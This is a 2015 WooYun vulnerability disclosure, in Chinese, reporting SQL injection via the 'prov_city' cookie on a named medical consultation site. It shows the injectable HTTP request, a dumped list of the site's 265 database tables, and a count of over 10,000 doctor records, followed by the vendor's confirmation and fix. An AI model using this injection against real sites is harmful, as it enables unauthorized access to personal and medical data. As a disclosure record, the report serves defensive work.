乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-21: 细节已通知厂商并且等待厂商处理中 2015-10-22: 厂商已经确认,细节仅向厂商公开 2015-11-01: 细节向核心白帽子及相关领域专家公开 2015-11-11: 细节向普通白帽子公开 2015-11-21: 细节向实习白帽子公开 2015-12-06: 细节向公众公开
cookie 参数prov_city注入
GET /?mod=expand HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://doc.120ask.com/Cache-Control: no-cacheHost: doc.120ask.comCookie: prov_city=%e6%b5%99%e6%b1%9f|%e6%9d%ad%e5%b7%9eAccept-Encoding: gzip, deflate
1w医生信息泄露
Database: newdoc[265 tables]+----------------------------------+| language || module || session || tmp_consultlist_backup_10-20 || tmp_consultlist_open-backup-1125 || admin || apply || apply_log || complaint || consultant || consultant_1019 || consultant_tmp || consultfrom || consultinfo2_10 || consultinfo2_11 || consultinfo2_12 || consultinfo2_13 || consultinfo2_14 || consultinfo2_6 || consultinfo2_7 || consultinfo2_8 || consultinfo2_9 || consultinfo_10 || consultinfo_11 || consultinfo_12 || consultinfo_13 || consultinfo_14 || consultinfo_15 || consultinfo_16 || consultinfo_17 || consultinfo_18 || consultinfo_19 || consultinfo_20 || consultinfo_21 || consultinfo_22 || consultinfo_23 || consultinfo_24 || consultinfo_25 || consultinfo_26 || consultinfo_27 || consultinfo_28 || consultinfo_29 || consultinfo_30 || consultinfo_31 || consultinfo_32 || consultinfo_33 || consultinfo_5 || consultinfo_6 || consultinfo_7 || consultinfo_8 || consultinfo_9 || consultinfo_del || consultinfo_open || consultlist || consultlist2 || consultlist_1 || consultlist_100 || consultlist_100__ || consultlist_101 || consultlist_101__ || consultlist_1__ || consultlist_2 || consultlist_2__ || consultlist_3 || consultlist_3__ || consultlist_4 || consultlist_4__ || consultlist_51 || consultlist_51__ || consultlist_60 || consultlist_60__ || consultlist_7 || consultlist_7__ || consultlist_del || consultlist_open || consultlist_open_ || consultlist_sphinx || doctor || doctor_1011 || doctor_120509 || doctor_aduser || doctor_analysis || doctor_analysis1 || doctor_t || hall || health_status || help_content || hide_list || im_cost_log || info_0 || info_1 || info_2 || info_3 || info_4 || info_5 || info_6 || info_7 || info_8 || info_9 || ip || ip_201008 || ip_201009 || ip_201010 || ip_201011 || ip_201012 || ip_201101 || ip_201102 || ip_201103 || ip_201104 || ip_201105 || ip_201106 || ip_201107 || ip_201108 || ip_201109 || ip_201110 || ip_201111 || ip_201112 || ip_201201 || ip_201202 || ip_201203 || ip_201204 || ip_201205 || ip_201206 || ip_201207 || ip_201208 || ip_201209 || ip_201210 || ip_201211 || ip_201212 || ip_201301 || ip_201302 || ip_201303 || ip_201304 || ip_201305 || ip_201306 || ip_201307 || ip_201308 || ip_201309 || ip_201310 || ip_201311 || ip_201312 || ip_201401 || ip_201402 || ip_201403 || ip_201404 || ip_201405 || ip_201406 || ip_201407 || ip_201408 || ip_201409 || ip_201410 || ip_201411 || ip_201412 || ip_201501 || ip_201502 || ip_201503 || ip_201504 || ip_201505 || ip_201506 || ip_201507 || ip_201508 || ip_201509 || ip_201510 || ip_201511 || ip_201512 || ip_201601 || ip_201602 || ip_201603 || ip_201604 || ip_201605 || ip_201606 || ip_201607 || ip_201608 || ip_201609 || ip_201610 || ip_201611 || ip_201612 || ip_201701 || ip_201702 || ip_201703 || ip_201704 || ip_201705 || ip_201706 || ip_201707 || ip_201708 || ip_201709 || ip_201710 || ip_201711 || ip_201712 || ip_201801 || ip_201802 || ip_201803 || ip_201804 || ip_201805 || ip_201806 || ip_201807 || ip_201808 || ip_201809 || ip_201810 || ip_201811 || ip_201812 || ip_201901 || ip_201902 || ip_201903 || ip_201904 || ip_201905 || ip_201906 || ip_201907 || ip_201908 || ip_201909 || ip_201910 || ip_201911 || ip_201912 || ip_202001 || ip_202002 || ip_202003 || ip_202004 || ip_202005 || ip_202006 || ip_202007 || ip_202008 || ip_202009 || ip_202010 || ip_202011 || ip_202012 || ipban || month_analyze || msglist_complaint || online_time || online_time_1011_ || online_time_1020 || online_time_1101 || orders || patient || profile || qqbind || qqmessage || rate || rate_20100901 || rate_20100908 || rate_20109014 || rate_analysis || rate_analysis_20140215 || rateall || reward || room_1 || room_10 || room_2 || room_3 || room_4 || room_5 || room_6 || room_7 || room_8 || room_9 || rooms || setting || tmp_consultlist_open2 || tmp_consultlist_open_1122 || tmp_hide_list || tmp_list_open || tmp_list_waike || user_lock_log || user_locked || user_qq |+----------------------------------+Database: newdoc+--------+---------+| Table | Entries |+--------+---------+| doctor | 10321 |+--------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-22 11:23
已经解决,感谢
2015-10-22:请将联系方式发给我,表示感谢